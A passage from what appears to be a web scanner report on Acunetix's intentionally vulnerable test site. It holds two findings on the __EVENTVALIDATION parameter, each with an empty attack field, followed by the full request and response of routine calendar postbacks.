(XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8353&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAZizTxdoIZGRk23BmIk6YRJr7QHtvQOW7UTlnWAg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLlkY2YDwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA8C1JWe5%2FoxIsdkxsXo%2FKBMHx1tC
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:24 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAZizTxdoIZGRk23BmIk6YRJr7QHtvQOW7UTlnWAg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLlkY2YDwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA8C1JWe5/oxIsdkxsXo/KBMHx1tC" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:White" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1059 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,059 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8385&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAACeefje2ghkZGSRVdvHDbIQ6owpw4rE58aznnf2FQ%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLLm9fJBwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBH5v9jQhGnqo0HE0J9KlFHCqSDdM
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:29 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAACeefje2ghkZGSRVdvHDbIQ6owpw4rE58aznnf2FQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLLm9fJBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBH5v9jQhGnqo0HE0J9KlFHCqSDdM" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:White" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
